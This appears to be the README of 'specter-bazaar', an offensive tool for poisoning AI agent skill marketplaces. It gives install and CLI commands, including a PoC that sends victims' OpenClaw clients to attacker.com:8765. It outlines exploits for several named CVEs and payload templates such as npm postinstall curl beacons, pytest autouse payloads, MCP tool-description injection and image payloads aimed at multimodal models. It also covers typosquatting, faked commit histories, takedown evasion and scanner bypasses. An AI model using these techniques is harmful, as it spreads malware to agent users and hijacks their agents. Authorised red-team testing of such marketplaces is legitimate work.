AI Agent App Store & Skill Marketplace Attack Engine — weaponises the skill supply chain across ClawHub, Smithery, OpenTools, MCP.run, and Glama. ClawHavoc-class distribution poisoning. BadSkill 99.5% ASR. 135,000+ exposed agents.
# Clone and install $ git clone https://github.com/RichardBarron27/red-specter-specter-bazaar $ cd red-specter-specter-bazaar $ pip install -e . # Verify $ specter-bazaar --version specter-bazaar, version 1.0.0 # Generate Ed25519 key pair (required for INJECT / UNLEASHED gates) $ specter-bazaar genkey --out-dir ~/.nightfall
| Gate | Subsystems Enabled | Requirement |
|---|---|---|
| OPEN | RECON, HARVEST, REPORT (passive mode) | No key required |
| INJECT | + FORGE, LURE, PUBLISH (dry-run), HIJACK, ECHO | Ed25519 INJECT signature + --override flag |
| UNLEASHED | + PUBLISH (live marketplace publication) | Ed25519 UNLEASHED signature + --i-understand-this-is-live-publication flag |
$ specter-bazaar full [OPTIONS] Options: --marketplace TEXT Target marketplace: clawhub | smithery | npm | opentools | glama | mcp-run --c2-domain TEXT Attacker C2 domain --gate TEXT OPEN | INJECT | UNLEASHED [default: OPEN] --key PATH Path to NIGHTFALL Ed25519 private key --override Confirm INJECT-gate operations --output TEXT text | json | markdown [default: text] --out-dir PATH Report output directory [default: .] --verbose Verbose subsystem output
| Command | Gate | Description |
|---|---|---|
specter-bazaar scan | OPEN | Enumerate marketplace skills and publisher graph. |
specter-bazaar harvest | OPEN | Scrape skill manifests, score BadSkill ASR. |
specter-bazaar forge | INJECT | Create weaponised skill from template. |
specter-bazaar lure | INJECT | Generate typosquats, laundered metadata, SEO lure pages. |
specter-bazaar publish | UNLEASHED | Publish skill to live marketplace (real API call). |
specter-bazaar hijack | INJECT | Exploit marketplace CVE against target. |
specter-bazaar echo | INJECT | Distribution channel poisoning operations. |
specter-bazaar report | OPEN | Generate signed BZR-{hex12} campaign report. |
specter-bazaar genkey | OPEN | Generate Ed25519 NIGHTFALL key pair. |
The openclaw:// URI scheme registers a local WebSocket handler on port 39281. A skill.md containing a crafted openclaw:// link causes the victim's OpenClaw desktop client to establish an unauthenticated WebSocket connection to the specified host and port. The attacker receives a persistent bidirectional channel into the victim's agent context. Affected: OpenClaw < 2026.1.25.
# PoC — generate CVE-2026-25253 exploit link in skill.md $ specter-bazaar hijack --cve CVE-2026-25253 \ --target http://localhost:39281 \ --attacker-ws attacker.com:8765 \ --mode poc --key ~/.nightfall/nightfall.key
Token confusion between the ClawHub pairing endpoint (/api/pair) and the admin API (/api/admin) allows a token issued with user scope to authenticate to admin endpoints without additional validation. An attacker with any valid ClawHub token (including tokens obtained from a published skill's install hook) can take over the marketplace account of any user who has installed a skill during a shared session window.
PraisonAI's API server exposes admin endpoints (/api/agents, /api/tools, /api/config) without authentication when running on default configuration. An unauthenticated attacker with network access can read system prompts, register malicious tools, and modify agent configuration.
Smithery's server build pipeline exposes the dockerBuildPath parameter without sanitisation. By specifying ../../etc/passwd or similar traversal sequences, an attacker with a published server can read arbitrary files from the Smithery build container, including mounted secrets and CI credentials.
Enumerates skill marketplaces via HTTP scraping (selectolax HTML parsing) and marketplace REST APIs. Builds a NetworkX DiGraph where nodes are publishers and edges indicate shared skill namespaces, dependency relationships, or coordinated publishing patterns (same first-seen day, same license text). Returns SkillProfile objects with install counts, publisher age, namespace gaps, and CVE applicability.
Downloads skill manifests and scores them using the BadSkill ASR model (arXiv:2604.09378): identifies skills with declared capability understatement (e.g., declares read_file, calls subprocess.run). Publisher trust scoring: GitHub account age, star count authenticity (star velocity pattern), commit history plausibility. Returns scored HarvestResult objects ranked by trojanisation viability.
Eight payload templates implemented via Jinja2:
| Template | Payload Type | Trigger |
|---|---|---|
npm_postinstall_bash | npm scripts.postinstall curl beacon | npm install |
clawhub_skill_md | skill.yaml with hidden postinstall + CVE-2026-25253 link | Skill install / SKILL.md render |
mcp_tool_poison | MCP server with injected tool description (Trail of Bits line-jumping) | LLM reads tool description |
rug_pull_state_machine | Benign v1, malicious payload activates at download threshold | N-th install (counter in C2) |
skill_trojan_shamir | Shamir secret-sharing split payload (arXiv:2604.06811) — no single shard is detectable | All N shares installed on target |
test_file_payload | conftest.py autouse fixture — runs on every pytest invocation | pytest |
symlink_trap | Symlinks to sensitive paths within skill's examples/ dir | File browser / skill install |
png_injection | PNG with injected payload in EXIF/LSB/alpha channel | Multimodal AI reads image |
Typosquat generator produces variants across five strategies: keyboard_substitution (adjacent keys), transposition (swap adjacent chars), homoglyph (Unicode lookalikes), combosquat (appends -ai/-sdk/-mcp/-tool/-official), scope_injection (injects into target org's npm scope, e.g., @anthropic/target-name). README cloner replaces author references and adds attacker repo links. Understatement metadata: declares minimal permissions in skill.yaml, uses full system access. create_aged_commit_history() generates a plausible N-commit history with randomised timestamps spread over days_back days.
BurnerAccountPool manages multiple marketplace accounts with automatic quarantine when takedown signals are detected. publish_to_npm() wraps the npm CLI with optional OTP override. watch_for_takedown() polls the marketplace API for removal signals and triggers reupload_fn callback with rotated skill variant. blitz() distributes across multiple skill directories and credential pools at configurable rate (max_per_hour). Dry-run mode (INJECT gate) validates the full publish pipeline without live API calls. UNLEASHED gate required for live publication.
MarketplaceHijack implements six exploit vectors. All have a live=False PoC mode that returns structured ExploitResult objects with CVSS metadata and attack vectors without making live connections. probe_target(target_url) fingerprints the marketplace platform and returns applicable CVEs. run_assessment(target_url) runs all applicable exploits in PoC mode and returns a combined probe+exploits dict.
DistributionChannelPoisoner maps the package resolution chain (registries → CDNs → mirrors) and identifies TOCTOU windows where a malicious version can be served between resolution and download. probe_mirrors() tests each identified mirror for unauthenticated write access. setup_rug_pull_state_machine() configures a download-count trigger: skill serves clean payload until trigger_downloads threshold is reached, then serves malicious variant. generate_scanner_bypass_bundle() returns three bypass techniques: Snyk bypass via conftest.py obfuscation, Cisco Umbrella bypass via symlink indirection, VirusTotal bypass via PNG steganography.
All reports are Ed25519-signed BZR-{hex12} format. The signing key is stored at ~/.red-specter/specter-bazaar/operator.key (mode 0o600). The report includes:
| Field | Contents |
|---|---|
report_id | BZR-{12 hex chars} unique identifier |
timestamp | ISO-8601 UTC |
signature | Ed25519 signature over report body (hex) |
blast_radius | install_count × payload_class severity — CRITICAL/HIGH/MEDIUM/LOW |
owasp_ast10 | OWASP Agentic Skills Top 10 AST01–AST10 mapping with findings |
mitre_techniques | ATLAS AML.T0018/T0020/T0051/T0054 + ATT&CK T1195.001/T1072 |
risk_score | 0.0–1.0 composite risk score |
evidence | Hash-chained evidence log |
| Reference | Relevance |
|---|---|
| ClawHavoc TTP (2026) | 1,184 malicious skills observed in wild — instruction laundering playbook basis for FORGE/LURE |
| arXiv:2604.09378 — BadSkill | 99.5% Attack Success Rate for malicious MCP skills — HARVEST scoring model |
| arXiv:2604.06811 — SkillTrojan | Shamir secret-sharing split payload — FORGE skill_trojan_shamir template |
| Trail of Bits MCP Line-Jumping | Tool description prompt injection surface — FORGE mcp_tool_poison template |
| OWASP Agentic Skills Top 10 (2026) | AST01–AST10 framework — REPORT mapping |
| CVE-2026-25253 (CVSS 8.8) | OpenClaw WebSocket hijack — HIJACK + FORGE CVE link |
| CVE-2026-32922 (CVSS 9.9) | ClawHub OAuth scope escalation — HIJACK exploit |
| CVE-2026-44338 (CVSS 9.1) | PraisonAI auth bypass — HIJACK exploit |
| CVE-2026-26319 (CVSS 8.1) | Telnyx webhook HMAC forgery — HIJACK exploit |